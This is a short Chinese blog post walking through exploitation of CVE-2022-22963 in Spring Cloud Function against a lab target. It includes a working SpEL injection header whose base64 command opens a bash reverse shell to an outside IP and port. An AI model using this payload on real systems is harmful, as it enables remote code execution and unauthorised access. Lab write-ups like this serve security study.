CVE-2022-22963

1、访问靶场页面

image-20241220185901510

2、bp抓包、改包,将payload填入数据包

POST:/functionRouter

//这里的反弹shell要经过base64编码
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")

编码反弹shell指令

image-20241220190214417

数据包最终内容

特别注意:一定要写一些内容在下面,让post有东西可传

image-20241220190433557

3、发送数据包,连接shell

image-20241220190604052

成功!

posted @ 2025-12-02 09:23  shinianyunyan  阅读(13)  评论(0)    收藏  举报